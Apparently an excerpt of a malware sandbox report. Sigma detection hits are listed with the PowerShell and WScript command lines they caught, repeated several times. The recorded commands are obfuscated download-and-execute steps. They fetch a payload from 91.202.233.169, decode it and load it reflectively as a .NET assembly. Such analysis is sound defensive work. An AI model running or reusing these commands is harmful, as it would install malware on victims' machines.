;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 
'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??W
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4
?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\sostener.vbs');powershell $Yolopolhggobek;,
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) 
;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7104, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text, ProcessId: 7396, ProcessName: powershell.exe
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 
'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??W
                  Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 3644, ProcessName: wscript.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 
'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??W
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 
'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7104, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text, ProcessId: 7396, ProcessName: powershell.exe
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 
'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??W
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) 